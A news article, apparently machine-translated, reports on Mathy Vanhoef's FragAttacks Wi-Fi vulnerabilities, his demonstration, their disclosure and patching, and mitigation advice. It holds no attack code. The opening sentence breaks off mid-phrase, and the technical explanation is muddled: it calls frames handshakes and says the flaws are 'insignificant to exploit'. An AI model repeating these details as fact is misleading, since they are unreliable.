Mathy Vanhoef, a Security researcher, known for finding holes in Wi-Fi security, has found a new way to break into Wi-Fi devices called FragAttacks (fragmentation and aggregation attacks). The method works on any Wi-Fi device back to 1
FragAttacks includes a range of vulnerabilities, three of which date back to the Wi-Fi implementation introduced in 1997. The vulnerabilities affect all modern Wi-Fi security protocols, from WPA-3 all the way back to WEP.
Vanhoef showed in a demonstration that the FragAttacks lead to several worrying possibilities. The demo shows that Vanhoef switches insecure IOT smart plugs on and off, steals usernames and passwords and even takes over a Windows 7 machine in a “secure” network. Stealing credentials and taking over computers is a major concern, to say the least.
To understand the vulnerabilities, it is important to understand how a Wi-Fi network works. Networks prevent you from being overwhelmed by splitting data into packages for shipping. These data packet fragments are later collected and reassembled. Rather than sending all the data together, sending fragments with smaller frames helps throughput on a network.
Frames are comparable to data packages; they are small parts of a message on a network. Frames act as a handshake between devices and contain more information about the message than a package. The vulnerabilities attack those facets of Wi-Fi networks to inject malicious frames into the network. FragAttacks can trick your network into accepting a fraudulent handshake message.
When your network accepts the handshake message, it accepts a second subframe associated with the first “handshake message”, which passes the real malicious data. As Vanhoef put it, “In a way, some of the code will think that the frame is a handshake message and will accept it, even if it is not encrypted. Another part of the code instead sees it as an aggregated frame and processes the packet that the opponent wants to inject. “
The attack works with any Wi-Fi device and network, even those that don’t support fragmentation and aggregation. That’s because those devices treat subframes as full frames and accept the malicious data. Several shortcomings in the Wi-Fi implementation make all of this possible.
The good news is that Vanhoef responsibly disclosed the vulnerabilities and gave it a nine-month turnaround time. Microsoft has already released patches for Windows 10 that should mitigate the problem, and a fix for Linux is coming. But that still makes many IOT devices, routers and macOS vulnerable. Vanhoef even managed to trick a macOS device into switching to a malicious DNS server, redirecting unsuspecting users to hacker-owned sites. And with a malicious DNS server, the hacker can exfiltrate private data such as usernames, passwords and possibly more.
The better news is that most vulnerabilities in the wild are hard to take advantage of. At least at the moment. But, says Vanhoef, the programming errors that led to the vulnerability are insignificant to exploit. However, you can reduce the exfiltration problem by sticking to HTTPS sites. Well-secured sites ensure that the malicious user cannot see your data during the transfer.
For now, update your devices as soon as possible, especially Windows 10 devices, as Microsoft has already released patches. And stick with HTTPS whenever possible, whether you’re up to date or not. The recently opened FragAttacks site describing the vulnerabilities also suggests “disable fragmentation, disable pairwise rekeys, and disable dynamic fragmentation in Wi-Fi 6 (802.11ax) devices.” And an open source tool on Github can help test if your routers are still vulnerable.